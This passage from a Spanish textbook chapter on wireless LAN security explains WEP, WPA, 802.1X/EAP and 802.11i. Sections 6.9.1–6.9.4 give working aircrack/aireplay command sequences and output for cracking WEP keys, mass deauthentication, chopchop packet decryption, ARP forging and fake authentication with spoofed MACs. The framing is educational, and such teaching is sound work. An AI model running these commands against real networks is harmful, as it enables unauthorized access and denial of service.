especialmente preocupado por este tema, la seguridad ofrecida por WEP puede ser
complementada con otras medidas de seguridad.

6.6 SOLUCIONES

En junio de 2001 el IEEE aprobó el estándar 802.11x. Este estándar incluye un nuevo
protocolo de seguridad conocido como EAP (Extensible Authentication Protocol,
‘Protocolo de Autentificación Extensible’). Este protocolo se utiliza para controlar el
acceso de los usuarios a los puntos de acceso y autentificar sus comunicaciones. EAP se
utiliza también para poder hacer una entrega segura de claves de la sesión. Con EAP se
pueden generar y distribuir automáticamente las claves WEP, eliminando la pesadez de un
proceso manual que deriva un deterioro de la seguridad.

802.11x. esta siendo cada vez más aceptado por la industria, hasta el punto de que tanto
Windows XP como algunos fabricantes de puntos de acceso ya lo incorporan. Por otro lado,
el comité 802.11i está trabajando para que 802.11x forme parte del estándar 802.11. Este
comité 802.11i tiene el objetivo de mejorar la seguridad de las redes inalámbricas. Uno de
los puntos es el control de acceso y la autentificación (ahí es donde entra 802.11x), pero
además, incluye temas como una metodología de cifrado mejor que WEP, un mejor uso del
IV (vector de inicialización) o protección contra los paquetes falsos, ataques de respuesta,
etc. El primer borrador de IEEE 802.11i salió en enero 2002.

REDES WLAN CON ACCESS POINT 135


6.7 SEGURIDAD EN LAS REDES INALÁMBRICAS.

Como hemos visto, el riesgo de seguridad que resulta más evidente en las redes
inalámbricas es el hecho de que, al estar formado por equipos que emiten los datos de
entorno, cualquier receptor que, este dentro del área de cobertura del emisor puede
interceptar dichos datos e intentar interpretarlos.

El estándar IEEE 802.11 contempla tres mecanismos básicos de seguridad:

• SSID (Service Set Identifier, ‘Identificador del Conjunto de Servicios’) es un código


alfanumérico que se configura en cada computadora y punto de acceso que forma
parte de la red. Este código puede ser utilizado como una simple contraseña entre la
estación y el punto de acceso o como un identificador del emplazamiento del emisor
en una red pública. Existen puntos de acceso que permiten que se les deshabilite el
sistema SSID. Lo cierto es que este sistema no garantiza excesivamente la
seguridad, ya que los códigos SSID son emitidos en forma de texto sin codificar.
Cualquier receptor con el software adecuado puede averiguar estos datos. De hecho
Windows XP incluye un programa que es capaz de detectar automáticamente estos
códigos y mostrarle al usuario la lista de redes (lista de SSID) detectadas para que el
usuario elija a cual desea conectarse.

• Se puede generar una lista de direcciones MAC y limitar el acceso a la red a


aquellas computadoras contempladas en la lista. Las direcciones MAC están
formadas por 12 caracteres alfanuméricos (por ejemplo, 12-AB-56-78-90-FE) e
identifican a la tarjeta de los adaptadores de red. Las direcciones MAC no son
modificables por el usuario. No obstante, es cierto que las direcciones se transmiten
en forma de texto sin codificar y, por tanto, son fácilmente legibles con un receptor
adecuado. Un intruso experimentado podría leer una dirección correcta,
configurársela a su estación y acceder a la red sin problemas. Por cierto, las
direcciones MAC no tienen nada que ver con la capa MAC del protocolo.

REDES WLAN CON ACCESS POINT 136


• La última medida de seguridad de WiFi consiste en el algoritmo de cifrado WEP
(Wired Equivalency Protocol, ‘Protocolo de Equivalencia con Red Cableada’). Con
este sistema se cifran todos los datos que se intercambian entre las computadoras y
los puntos de acceso. WEP utiliza el algoritmo de cifrado PRNG (Pseudorandom
Number Generation, ‘Generación de Números Pseudoaleatorios’) RC4 desarrollado
en 1987 por RSA Data Security. La utilización de la técnica de cifrado WEP es
opcional (Figura 6.1).

Figura 6.1 Creación de un mensaje cifrado a partir del mensaje abierto.

6.7.1 WEP

El sistema de cifrado WEP consiste en aplicar a los datos originales la operación lógica
XOR (O exclusiva) utilizando una clave generada de forma pseudoaleatoria. Los datos
cifrados resultantes son los que se transmiten al medio. Para generar la clave
pseudoaleatoria, se utiliza una clave secreta definida por el propio usuario y un vector de
inicialización (IV, Initialization Vector). La clave secreta es única y debe estar configurada
en todas las computadoras y puntos de acceso.

REDES WLAN CON ACCESS POINT 137


La longitud de los datos cifrados excede en cuanto a caracteres la longitud de los datos
originales. Estos cuatro caracteres reciben el nombre de ICV (Integrity Check Value, ‘Valor
de comprobación de integridad’) y se utilizan para que el receptor pueda comprobar la
integridad de la información recibida. Esto se hace mediante el algoritmo CRC-32.
Una vez que llegan al destino los datos cifrados, se combina el IV con la clave secreta
(distribuida a todas las estaciones) para generar la semilla que permitirá descifrar los datos
mediante el algoritmo PRNG. Uno de los inconvenientes que tiene este sistema de cifrado
es que la clave secreta es estática. Una vez asignada, se configura en cada estación y
permanece invariable hasta que se vuelva a repetir este proceso manualmente. Si se
perdiese una de las estaciones de la red, habría que volver a configurar una nueva clave en
todas las estaciones para garantizar la seguridad. Por otro lado, el IV se transmite en
abierto. En todas las estaciones. El IV si cambia periódicamente

6.7.2 WPA LA SOLUCIÓN ACTUAL.

Después de lo visto, no es de extrañar que una de las mayores debilidades que siempre ha
estado presente cuando se habla de WiFi haya sido la seguridad. Este hecho no solo ha
preocupado a los usuarios de WiFi, sino que también ha provocado la reacción de muchos
miembros de la alianza WiFi (de WECA) para intensificar los trabajos que permitan crear
un mecanismo que permita dotar a los productos certificados. WiFi de altos niveles de
seguridad. El resultado es que la alianza WiFi, conjuntamente con el IEEE, ha sacado al
mercado un nuevo sistema de seguridad para WiFi conocido como WPA (WiFi Protected
Access, ‘Acceso WiFi Protegido).

WPA son unas especificaciones basadas en el estándar IEEE 802.11i que mejora
fuertemente el nivel de protección de datos y el control de acceso de las redes inalámbricas
WiFi. La gran ventaja de WPA es que pueden aplicarse a las redes WiFi existentes y que es
completamente compatible con el futuro sistema de seguridad integrada proporcionado por
IEEE802.11i.

REDES WLAN CON ACCESS POINT 138


WPA se puede instalar en los equipos WiFi existentes de una forma tan sencilla como
instalar un pequeño software en los equipos. Una vez instalad, el nivel de seguridad
adquirido es extremadamente alto, asegurándose que solo los usuarios autorizados pueden
acceder a la red y que los datos transmitidos permanecen completamente inaccesibles para
cualquier usuario que no sea el destinatario, se espera que WPA a corto plazo sustituya el
WEP.

Las mayores ventajas que aporta WPA frente a WEP son dos:

• Mejoras en el cifrado de datos mediante TKIP (Temporal Key Integrity Protocol,


‘Protocolo temporal de Integridad Clave’). Este sistema asegura la confidencialidad
de los datos.

• Autentificación de los usuarios mediante el estándar 802.11x y EAP (Extensible


Authetication Protocol, ‘Protocolo Extensible de Autentificación’). Este sistema
permite controlar a todos y cada uno de los usuarios que se conectan a la red. No
obstante, si se desea, permite el acceso de usuarios anónimos.

Actualmente el IEEE está terminado de desarrollar las especificaciones del estándar


802.11i. Como WPA sale antes que 802.11i, no puede seguir todas estas especificaciones.
No obstante, lo que cubre actualmente WPA será completamente compatible con este
nuevo estándar. Se puede decir que WPA es un subconjunto de 802.11i. WPA ha tomado
de 802.11i aquellas características que son ya comercializables, como 802.11x y TKIP, y ha
dejado aparte aquellas otras características que 802.11i no tiene aun completamente
definidas. Las características que no incluye WPA son básicamente la desautentificación
segura, la desasociación. IBSS segura, cambio seguro de puntos de acceso, así como
protocolos mejorados de cifrado como AES-CCMP. Uno de los inconvenientes mayores
que incluyen algunas de estas características (no incluidas en WPA) es que requieren
cambios en el hardware de los equipos de WiFi actuales.

REDES WLAN CON ACCESS POINT 139


Por el contrario, todas las características que incluye WPA pueden ser actualizadas en los
equipos WiFi actuales mediante software.

6.8 MEDIDAS DE PROTECCIÓN.

En un principio, las barreras de seguridad básicas que pueden tenerse en cuenta para cada
uno de los riesgos son las siguientes:

• Perdida del equipo. Tomar las precauciones mínimas para evitar en lo posible la
pérdida o robo del equipo. No dejar grabados en el equipo los nombres del usuario y
contraseña, ni tampoco dejar estos datos escritos en papeles que estén
permanentemente con el equipo.

• Infección por virus. Utilizar software antivirus. Los ataques exteriores se pueden
presentar bajo tres formas: virus, gusanos y troyanos. Un virus es un programa
diseñado para auto replicarse y ejecutarse sin el conocimiento del usuario. Un
gusano es un programa que está pensado para auto replicarse y difundirse por el
mayor número de equipos posibles. Un troyano es un programa que aparenta ser un
programa útil. Pero que realmente, se dedica a recoger información o a facilitar que
el intruso tenga acceso a esa computadora o a la red en la que se encuentra. Los
nuevos virus están diseñados utilizando los controles. Active X y Java que
incorporan los navegadores de internet. De esta forma estos programas pueden
funcionar sin el conocimiento del usuario. El mundo de la piratería esta siempre
evolucionando; por este motivo, conviene mantener actualizado el software
antivirus.

• Uso equivocado por personas autorizadas. (intencionado u accidental). Para estos


casos es fundamental implantar una política de seguridad donde se defina cuales son
los puntos importantes que se deben de tener en cuenta en relación con la seguridad.

REDES WLAN CON ACCESS POINT 140


• Uso fraudulento por personas no autorizadas. A pesar de que los problemas de
seguridad es un tema que tiene en mente la mayoría de los usuarios, muchas veces
no se le dedica una mínima atención. Por ejemplo es habitual dejar configurados los
productos en su configuración por defecto. Si hay algo que conocen los intrusos es
la configuración por defecto. Si hay algo que conocen los intrusos es la
configuración por defecto de los equipos. Por ello, es recomendable cambiar las
claves de acceso y activar las medidas de seguridad no configuradas por defecto.

6.9 DESCUBRIMIENTO DE LA CLAVE.

La tecnología WiFi (Wireless Fidelity) es una de las tecnologías líder en la comunicación


inalámbrica, y el soporte para WiFi se está incorporando en cada vez más aparatos:
portátiles, PDAs o teléfonos móviles. De todas formas, hay un aspecto que en demasiadas
ocasiones pasa desapercibido: la seguridad. Analicemos con más detalle el nivel de
seguridad de los métodos de encriptación utilizados por las soluciones WiFi actuales.

Aun cuando se activen las medidas de seguridad en los aparatos WiFi, se utiliza un
protocolo de encriptación débil, como WEP. En este artículo, examinaremos las debilidades
de WEP y veremos lo sencillo que es crackear el protocolo. La lamentable inadecuación de
WEP resalta la necesidad de una nueva arquitectura de seguridad en el estándar 802.11i,
por lo que también estudiaremos la puesta en práctica de WPA y WPA2 junto a sus
primeras vulnerabilidades menores y su integración en los sistemas operativos. La única
manera de conseguir seguridad es manteniendo unas técnicas de protección adecuadas. Hay
que ser consientes de que ninguna técnica de protección es eficaz al cien por ciento.
Siempre existe riesgo aunque sea pequeño. No obstante a más barreras de seguridad, menor
será el riesgo. WEP (Wired Equivalent Privacy) fue el primer protocolo de encriptación
introducido en el primer estándar IEEE 802.11 allá por 1999. Está basado en el algoritmo
de encriptación RC4, con una clave secreta de 40 o 104 bits, combinada con un Vector de
Inicialización (IV) de 24 bits para encriptar el mensaje de texto M y su checksum el ICV
(Integrity Check Value). El mensaje encriptado C se determinaba utilizando la siguiente
fórmula:

REDES WLAN CON ACCESS POINT 141


C = [ M || ICV(M) ] + [ RC4(K || IV) ] (1)

Figura 6.2 Protocolo de Encriptación WEP.

El protocolo WEP no fue creado por expertos en seguridad o criptografía, así que pronto se
demostró que era vulnerable ante los problemas RC4 descritos por David Wagner cuatro
años antes. En 2001, Scott Fluhrer, Itsik Mantin y Adi Shamir (FMS para abreviar)
publicaron su famoso artículo sobre WEP, mostrando dos vulnerabilidades en el algoritmo
de encriptación: debilidades de no-variación y ataques IV conocidos.

Ambos ataques se basan en el hecho de que para ciertos valores de clave es posible que los
bits en los bytes iniciales del flujo de clave dependan de tan sólo unos pocos bits de la clave
de encriptación (aunque normalmente cada bit de un flujo de clave tiene una posibilidad del
50% de ser diferente del anterior). Como la clave de encriptación está compuesta
concatenando la clave secreta con el IV, ciertos valores de IV muestran claves débiles.
Estas vulnerabilidades fueron aprovechadas por herramientas de seguridad como AirSnort,
permitiendo que las claves WEP fueran descubiertas analizando una cantidad de tráfico
suficiente. Aunque este tipo de ataque podía ser desarrollado con éxito en una red con
mucho tráfico en un plazo de tiempo razonable, el tiempo requerido para el procesamiento
de los datos era bastante largo.

REDES WLAN CON ACCESS POINT 142


David Hulton (h1kari) ideó un método optimizado de este mismo ataque, tomando en
consideración no sólo el primer byte de la salida RC4 (como en el método FMS), sino
también los siguientes. Esto resultó en una ligera reducción de la cantidad de datos
necesarios para el análisis.

La etapa de comprobación de integridad también sufre de serias debilidades por culpa del
algoritmo CRC32 utilizado para esta tarea. CRC32 se usa normalmente para la detección de
errores, pero nunca fue considerado como seguro desde un punto de vista criptográfico,
debido a su linealidad, algo que Nikita Borisov, Ian Goldberg y David Wagner ya habían
advertido en 2001.

Desde entonces, se ha aceptado que WEP proporciona un nivel de seguridad aceptable sólo
para usuarios domésticos y aplicaciones no críticas. Sin embargo, incluso eso se desvaneció
con la aparición de los ataques KoreK en 2004 (ataques generalizados FMS, que incluían
optimizaciones de h1kari), y el ataque inductivo invertido Arbaugh, permitiendo que
paquetes arbitrarios fueran desencriptados sin necesidad de conocer la clave utilizando la
inyección de paquetes.

Las herramientas de cracking, como Aircrack de Christopher Devine o WepLab de José


Ignacio Sánchez, ponen en práctica estos ataques y pueden extraer una clave WEP de 128-
bits en menos de 10 minutos (o algo más, dependiendo del punto de acceso y la tarjeta
wireless específicos).

La incorporación de la inyección de paquetes mejoró sustancialmente los tiempos de


crackeo de WEP, requiriendo tan sólo miles, en lugar de millones, de paquetes con sufi-
cientes IVs únicos alrededor de 150,000 para una clave WEP de 64-bits y 500,000 para una
clave de 128-bits. Con la inyección de paquetes, el obtener los datos necesarios era apenas
una tarea de minutos. En la actualidad, WEP está definitivamente muerto y no debería ser
utilizado, ni siquiera con rotación de claves.

REDES WLAN CON ACCESS POINT 143


Los fallos de seguridad de WEP pueden resumirse tal y como sigue:

• Debilidades del algoritmo RC4 dentro del protocolo WEP debido a la construcción
de la clave.
• Los IVs son demasiado cortos (24 bits – hacen falta menos de 5000 paquetes para
tener un 50% de posibilidades de dar con la clave) y se permite la reutilización de
IV (no hay protección contra la repetición de mensajes).
• No existe una comprobación de integridad apropiada (se utiliza CRC32 para la
detección de errores y no es criptográficamente seguro por su linealidad).
• No existe un método integrado de actualización de las claves.

6.9.1 ATAQUE 1.

El crackeado de WEP puede ser demostrado con facilidad utilizando herramientas como
Aircrack (creado por el investigador francés en temas de seguridad, Christopher Devine).
Aircrack contiene tres utilidades principales, usadas en las tres fases del ataque necesario
para recuperar la clave:

• Airodump: herramienta de sniffing utilizada para descubrir las redes que tienen
activado WEP.
• Aireplay: herramienta de inyección para incrementar el tráfico.
• Aircrack: crackeador de claves WEP que utiliza los IVs únicos recogidos.

En la actualidad, Aireplay sólo soporta la inyección en algunos chipsets wireless, y el


soporte para la inyección en modo monitor requiere los últimos drivers parcheados. El
modo monitor es el equivalente del modo promiscuo en las redes de cable, que previene el
rechazo de paquetes no destinados al host de monitorización (lo que se hace normalmente
en la capa física del stack OSI), permitiendo que todos los paquetes sean capturados. Con
los drivers parcheados, sólo se necesita una tarjeta wireless para capturar e inyectar tráfico
simultáneamente.

REDES WLAN CON ACCESS POINT 144


La meta principal del ataque es generar tráfico para capturar IVs únicos utilizados entre un
cliente legítimo y el punto de acceso. Algunos datos encriptados son fácilmente re-
conocibles porque tienen una longitud fija, una dirección de destino fija, etc. Esto sucede
con los paquetes de petición ARP (véase Recuadro ARP-Request), que son enviadas a la
dirección broadcast (FF:FF:FF: FF:FF:FF) y tienen una longitud fija de 68 octetos. Las
peticiones ARP pueden ser repetidas para generar nuevas respuestas ARP desde un host
legítimo, haciendo que los mensajes wireless sean encriptados con nuevos IVs.
En los siguientes ejemplos, 00: 13:10:1F:9A:72 es la dirección MAC del punto de acceso
(BSSID) en el canal 1 con ESSID hakin9demo y 00:09:5B:EB:C5:2B es la dirección MAC
de un cliente wireless (utilizando WEP o WPA-PSK, dependiendo del caso). La mayor
parte de los comandos requieren privilegios de root.

El primer paso, es la activación del modo monitor en nuestra tarjeta wireless (en este caso,
un modelo basado en Atheros), así que podemos capturar todo el tráfico (ver Listado 1). El
paso siguiente, será descubrir redes cercanas y sus clientes, escaneando los 14 canales que
utilizan las redes WiFi (ver Listado 2).

El resultado del Listado 2 se puede interpretar de esta forma: un punto de acceso con
BSSID 00:13: 10:1F:9A:72 está usando encriptación WEP en el canal 1 con SSID
hakin9demo y un cliente identificado con MAC 00:0C:F1:19:77:5C están asociados y
autenticados en esta red wireless.

Listado 1. Activando el modo monitor


# airmon.sh start ath0
Interface Chipset Driver
Ath0 Atheros mandwifi (monitor mode enabled)

REDES WLAN CON ACCESS POINT 145


Listado 2. Descubriendo las redes cercanas y sus clientes
# airodump ath0 wep-crk 0

BSSID PWR Beacons # Data CH MB ENC ESSSID


00:13:10:1F:9A:72 62 305 16 1 48 WEP hakin9demo

BSSID STATION PWR Packets ESSSID


00:13:10:1F:9A:72 00:0C:F1:19:77:5C 56 1 hakin9demo

Una vez se haya localizado la red objetivo, deberíamos empezar a capturar en el canal
correcto para evitar la pérdida de paquetes mientras escaneamos otros canales. Esto
produce la misma respuesta que el comando previo:

# airodump ath0 wep-crk 1

Después, podremos usar la información recogida para inyectar tráfico utilizando aireplay.
La inyección empezará cuando una petición ARP capturada, asociada con el BSSID
objetivo aparezca en la red inalámbrica:

# aireplay -3 \
-b 00:13:10:1F:9A:72 \
-h 00:0C:F1:19:77:5C \
-x 600 ath0
(...)
Read 980 packets
(got 16 ARP requests),
sent 570 packets...

Finalmente, aircrack se utiliza para recuperar la clave WEP. Utilizando el fichero pcap se
hace posible lanzar este paso final mientras airodump sigue capturando datos (véase Figura
6.2 para los resultados) la pantalla que aparece en la figura es de color negro:

REDES WLAN CON ACCESS POINT 146


# aircrack -x -0 wep-crk.cap

Aircrack 2.3
[00:00:09] Tested 2 Keys (got 707852 IVs)

KB depth byte(vote)
0 0/ 1 BB( 90) 32 ( 18) 25( 17) 6B( 17) 42( 15) 7E( 15)
1 0/ 1 EB( 115) 6A( 39) 73( 38) 2B( 25) 74( 25) 3C( 19)
2 0/ 1 5A( 162) CD( 17) 1A( 13) 09( 12) 1F( 12) 84( 11)
3 0/ 1 24( 519) 23( 69) 7C( 20) 5C( 17) 7B( 12) BE( 12)
4 0/ 1 50( 107) F8( 30) EF( 28) FD( 18) 4F( 17) C1( 12)
5 0/ 1 F9( 135) D9( 27) A5( 21) 93( 18) A0( 18) 14( 15)
7 0/ 1 73( 195) 9E( 22) 78( 20) 91( 20) EA( 20) 67( 12)
8 0/ 1 0E( 272) C0( 28) D2( 26) BC( 21) 03( 18) 73( 17)
9 0/ 1 D6( 267) 90( 101) 5E( 54) 95( 35) 1F( 33) ED( 32)
10 0/ 1 94( 187) 04( 25) 40( 23) 55( 20) 64( 20) B4( 20)
11 0/ 1 B4( 178) 1F( 38) 21( 35) 0D( 27) 8C( 27) DB( 26)
12 0/ 1 65( 245) 5A( 33) DB( 34) 48( 30) 5E( 29) 45( 28)

KEY FOUND! [ BB:EB:5A:24:50:F9:73:5F:0E:D6:94:B4:65 ]

Figura 6.2. Resultados de Aircrack después de unos minutos.

Figura 6.3 Resultados de Aircrack después de unos minutos.

Otros tipos de ataque Aircrack

Aircrack hace también posible realizar otros tipos interesantes de ataques. Veamos algunos
de ellos.

6.9.2 ATAQUE 2: DESAUTENTICACIÓN.

Este ataque puede ser usado para recuperar un SSID oculto (por ejemplo, uno que no sea
broadcast), capturar un WPA 4-way handshake o forzar una Denegación del Servicio (más
sobre ello después, en la sección sobre 802.11i). El objetivo del ataque es forzar al cliente a
reautenticarse, lo que unido a la falta de autenticación para los marcos de control (usados
para autenticación, asociación, etc.) hace posible que el atacante consiga hacer spoof de las
direcciones MAC.

REDES WLAN CON ACCESS POINT 147


Un cliente wireless puede ser deautenticado usando el siguiente comando, que hace que se
envíen paquetes de deautenticación desde el BSSID al cliente MAC haciendo spoofing del
BSSID:

# aireplay -0 5
-a 00:13:10:1F:9A:72
-c 00:0C:F1:19:77:5C
ath0

Se puede lograr una deautenticación masiva, aunque no siempre es fiable, haciendo que el
atacante esté haciendo spoofing constante del BSSID y reenviando el paquete de
deautenticación a la dirección broadcast:

# aireplay -0 0
-a 00:13:10:1F:9A:72
ath0

6.9.3 ATAQUE 3: DESENCRIPTACIÓN DE PAQUETES DE DATOS WEP


ARBITRARIOS SIN CONOCER LA CLAVE.

Este ataque está basado en la herramienta representativa de KoreK, llamada chopchop, que
puede desencriptar paquetes encriptados con WEP sin conocer la clave. El chequeo de
integridad implementado en el protocolo WEP permite que el atacante pueda modificar
tanto un paquete encriptado como su correspondiente CRC. Más aún, el uso del operador
XOR en el protocolo WEP significa que un byte seleccionado en el mensaje encriptado
siempre depende del mismo byte en el paquete plaintext. Cortando el último byte del
mensaje encriptado lo corrompe, pero también hace posible intentar adivinar el valor del
byte plaintext correspondiente y corregir el mensaje encriptado.

REDES WLAN CON ACCESS POINT 148


Si el paquete corregido es re-inyectado a la red, será desechado por el punto de acceso si el
intento ha sido incorrecto (en cuyo caso hay que hacer otro intento), pero si el intento ha
tenido éxito, se tomará el paquete como de costumbre. Repetir el ataque para todos los
bytes del mensaje consigue que podamos desencriptar un paquete WEP y recuperar el flujo
de clave. Recordemos que la implementación IV no es obligatoria en el protocolo WEP, así
que es posible reutilizar este flujo de datos para hacer spoof de paquetes posteriores
(reutilizando el mismo IV).

La tarjeta wireless debe estar situada en modo monitor, en el canal adecuado. El ataque
debe ser lanzado contra un cliente legítimo (por ejemplo 00:0C:F1:19:77:5C en nuestro
caso) y aireplay pedirá al atacante que acepte los paquetes encriptados (ver Listado 3). Se
crean dos ficheros pcap: uno para los paquetes desencriptados, y otro para su flujo de datos
correspondiente. El archivo resultante puede ser legible por humanos usando un lector
apropiado (usaremos tcpdump), (ver Listado 4) para un ejemplo de ping intercambiado
entre hosts.

Una vez capturado el flujo de clave, es posible imitar cualquier paquete. Aquí tenemos una
petición ARP enviada desde 192.168.2.123 (00: 0C:F1:19:77:5C) a 192.168.2.103:

# arpforge \
replay_dec-0916-114019.xor \
1\
00:13:10:1F:9A:72 \
00:0C:F1:19:77:5C \
192.168.2.123 \
192.168.2.103 \
forge-arp.cap

REDES WLAN CON ACCESS POINT 149


Listado 3. Desencriptando paquetes WEP sin conocer la clave

# aireplay -4 –h 00:0C:F1:19:77:5C ath0


Read 413 packets…
Size: 124, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:13:10:1F:9A:72
Dest. MAC = 00:13:10:1F:9A:70
Source MAC = 00:0C:F1:19:77:5C
0x0000: 0841 d500 0013 101f 9a72 000c f119 775c .Á…....r…..W\
0x0010: 0013 101f 9a70 c040 c3ec e100 biel 062c .…..p.@.........,
0x0020 : 5cf9 2783 0c89 68a0 23f5 0b47 5abd 5b66 \.’.h..#...GZ.[v
0x0030: 0078 91c8 adfe bf30 d98c 1668 56bf 536c .x...0..…hv.S1
0x0040: 7046 5fd2 d44b c6a0 a3e2 6ae1 3477 74b4 pF_..K…j.4wt
0x0050: fb13 ciad b8b8 e735 239a 55c2 ea9f 5be6 …….5#.U…[.
0x0060: 892b 3ec1 5b1a a1a7 223b 0844 37d1 e6e1 .+>..[…”;.D7..
0x0070: 3b88 c5b1 0843 0289 1bff 5160 ;….C…Q’
Use this packet ? y
Saving chosen packet in replay_src-0916-113713.cap
offset 123 ( 0% done ) │ xor = 07 │ pt = 67 │ 373 frames written in 1120ms
offset 122 ( 1% done ) │ xor = 7D│ pt = 2C │ 671 frames written in 2013ms
(…)
offset 35 (97 % done) │ xor = 83 │ pt = 00 │ 971 frames written in 2072ms
offset 24 (98 % done) │ xor = 2F │ pt = 08 │ 692 frames written in 2076ms
Saving plaintext in replay_dec-0916-114019.cap
Saving keystream in replay_dec-0916-114019.xor
Completed in 183 s (o.47 bytes / s)

Listado 4. Leyendo un fichero pcap del ataque


# tcpdump -s 0 -e -r replay_dec-0916-114019.cap
reading from file replay_dec-0916-114019.cap, link-type IEEE802_11 (802.11)
11:40:19.642112 BSSID:00:13:10:If:9a:72
SA:00:0c:f1:19:77:5c: DA: 00:13:10:If:9a:70
LLC, dsap SNAP (0xaa), ssap SNPA (0xaa), cmd 0x03: oui Ethernet (0x000000),
Ethertype IPv4 (0x0800) : 192.168.2.103 > 192.168.2.254:
ICMP echo request, id 23046, seq 1, length 64

Finalmente aireplay se usa para volver a ejecutar este paquete (ver Listado 5).

REDES WLAN CON ACCESS POINT 150


Listado 5. Re-ejecución de un paquete falso

# aireplay -2 –r forge-arp.cap ath0


Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:13:10:1F:9A:72
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:0C:F1:19:77:5C
0x0000: 0841 0201 0013 101f 9a72 000c f119 775c .Á…...r….W\
0x0010: ffff ffff ffff 8001 c3ec e100 biel 062c ………..……,
0x0020: 5cf9 2785 4988 60f4 25f1 4b46 lab0 199c \.’.I.’.%.KF….
0x0030: b78c 5307 6f2d bdce d18c 8d33 cc11 510a ..S.0-…..3..Q.
0x0040: 49B7 52da
Use this packet 7 y
Saving chosen packet in replay_src-0916-124231.cap
You must also start airodump to capture replies.
Sent 1029 packets

Este método es menos automático que el propio ARP request spoofing de Airckrack (la
opción 1), pero es más escalable el atacante puede usar el flujo descubierto para imitar
cualquier paquete que no sea más largo que el flujo de datos (si no, el flujo de clave debe
ser expandido).

Listado 6. Autentificación falsa

# aireplay -1 0 –e hakin9demo –a 00:13:10:1F:9A:72 -h 0:1:2:3:4:5 atn0


18:30:00 Sending Authentication Request
18:30:00 Authentication successful
18:30:00 Sending Association Request
18:30:00 Associationt successful

REDES WLAN CON ACCESS POINT 151


6.9.4 ATAQUE 4: AUTENTICACIÓN FALSA.

El método de crackeado de la clave WEP descrito anteriormente (Ataques 1 y 3) requiere


un cliente legítimo (real o virtual, aunque real sería mejor), asociado con el punto de acceso
para asegurarse de que el punto de acceso no rechace los paquetes por una dirección de
destino no asociada. Si se utiliza autenticación abierta, cualquier cliente podrá ser au-
tenticado y asociado con el punto de acceso, pero el punto de acceso rechazará los paquetes
no encriptados con la clave WEP correcta. En el ejemplo del Listado 6, se utiliza Aireplay
para imitar una petición de autenticación y asociación para el SSID hakin9demo (BSSID:
00:13: 10:1F:9A:72) con la dirección MAC falseada 0:1:2:3:4:5. Algunos puntos de acceso
requieren que los clientes se vuelvan a asociar cada 30 segundos. Este comportamiento
puede ser minimizado en aireplay sustituyendo la segunda opción (0) por 30.

6.10 IEEE 802.1X Y EAP

El protocolo de autenticación IEEE 802.1X (también conocido como Port-Based Network


Access Control) es un entorno desarrollado originalmente para redes de cable, y posee
mecanismos de autenticación, autorización y distribución de claves y además incorpora
controles de acceso para los usuarios que se unan a la red. La arquitectura IEEE 802.1X
está compuesta por tres entidades funcionales:

• El suplicante que se une a la red.

• El autenticador que hace el control de acceso.

• El servidor de autenticación que toma las decisiones de autorización.

En las redes inalámbricas, el punto de acceso sirve de autenticador. Cada puerto físico
(puerto virtual en las redes inalámbricas) se divide en dos puertos lógicos, formando la
PAE (Port Access Entity).

REDES WLAN CON ACCESS POINT 152


La PAE de autenticación está siempre abierta y permite el paso de procesos de
autenticación, mientras que el PAE de servicio sólo se abre tras una autenticación exitosa
(por ejemplo, una autorización) por un tiempo limitado (3600 segundos por defecto). La
decisión de permitir acceso está hecha por lo general por la tercera entidad, el servidor de
autenticación (que puede ser un servidor Radius dedicado o por ejemplo en las redes
domésticas un simple proceso funcionando en el punto de acceso). La Figura 6.3 ilustra el
modo de comunicación entre estas entidades.

El estándar 802.11i hace pequeñas modificaciones a IEEE 802.1X para que las redes
inalámbricas estén protegidas frente al robo de identidades. La autenticación de mensajes se
ha incorporado para asegurarse de que tanto el suplicante como el autenticador calculan sus
claves secretas y activan la encriptación antes de acceder a la red. El suplicante y el
autenticador se comunican mediante un protocolo basado en EAP. El rol del autenticador
es, esencialmente, pasivo se limita a enviar todos los mensajes al servidor de autenticación.

EAP es un entorno para el transporte de varios métodos de autenticación y permite sólo un


número limitado de mensajes (Request, Response, Success, Failure), mientras que otros
mensajes intermedios son dependientes del método seleccionado de autenticación: EAP-
TLS, EAP-TTLS, PEAP, Kerberos V5, EAP-SIM etc.

Cuando se completa el proceso (por la multitud de métodos posibles no entraremos en


detalles), ambas entidades (suplicante y servidor de autenticación) tendrán una clave
maestra secreta. El protocolo utilizado en las redes inalámbricas para transportar EAP se
llama EAPOL (EAP Over LAN), las comunicaciones entre autenticador y servidor de
autenticación utilizan protocolos de capa más alta, como Radius, etc.

REDES WLAN CON ACCESS POINT 153


Figura 6.4 Modelo de IEEE 802.1X según la especificación IEEE 802.1X.

6.11 802.11i.

En enero de 2001, el grupo de trabajo i task group fue creado en IEEE para mejorar la
seguridad en la autenticación y la encriptación de datos. En abril de 2003, la WiFi Alliance
(una asociación que promueve y certifica WiFi) realizó una recomendación para responder
a las preocupaciones empresariales ante la seguridad inalámbrica. Sin embargo, eran
conscientes de que los clientes no querrían cambiar sus equipos. En junio de 2004, la
edición final del estándar 802.11i fue adoptada y recibió el nombre comercial WPA2 por
parte de la alianza WiFi. El estándar IEEE 802.11i introdujo varios cambios fundamentales,
como la separación de la autenticación de usuario de la integridad y privacidad de los
mensajes, proporcionando una arquitectura robusta y escalable, que sirve igualmente para
las redes locales domésticas como para los grandes entornos de red corporativos.

REDES WLAN CON ACCESS POINT 154


La nueva arquitectura para las redes wireless se llama Robust Security Network (RSN) y
utiliza autenticación 802.1X, distribución de claves robustas y nuevos mecanismos de
integridad y privacidad. Además de tener una arquitectura más compleja, RSN proporciona
soluciones seguras y escalables para la comunicación inalámbrica. Una RSN sólo aceptará
máquinas con capacidades RSN, pero IEEE 802.11i también define una red transicional de
seguridad Transitional Security Network (TSN), arquitectura en la que pueden participar
sistemas RSN y WEP, permitiendo a los usuarios actualizar su equipo en el futuro. Si el
proceso de autenticación o asociación entre estaciones utiliza 4-Way handshake, la
asociación recibe el nombre de RSNA (Robust Security Network Association).

El establecimiento de un contexto seguro de comunicación consta de cuatro fases (ver


Figura 6.4):

• Acuerdo sobre la política de seguridad.


• Autenticación 802.1X.
• Derivación y distribución de las claves.
• Confidencialidad e integridad de los datos RSNA.

6.11.1 FASE 1: ACUERDO SOBRE LA POLÍTICA DE SEGURIDAD.

La primera fase requiere que los participantes estén de acuerdo sobre la política de
seguridad a utilizar. Las políticas de seguridad soportadas por el punto de acceso son
mostradas en un mensaje Beacon o Probe Response (después de un Probe Request del
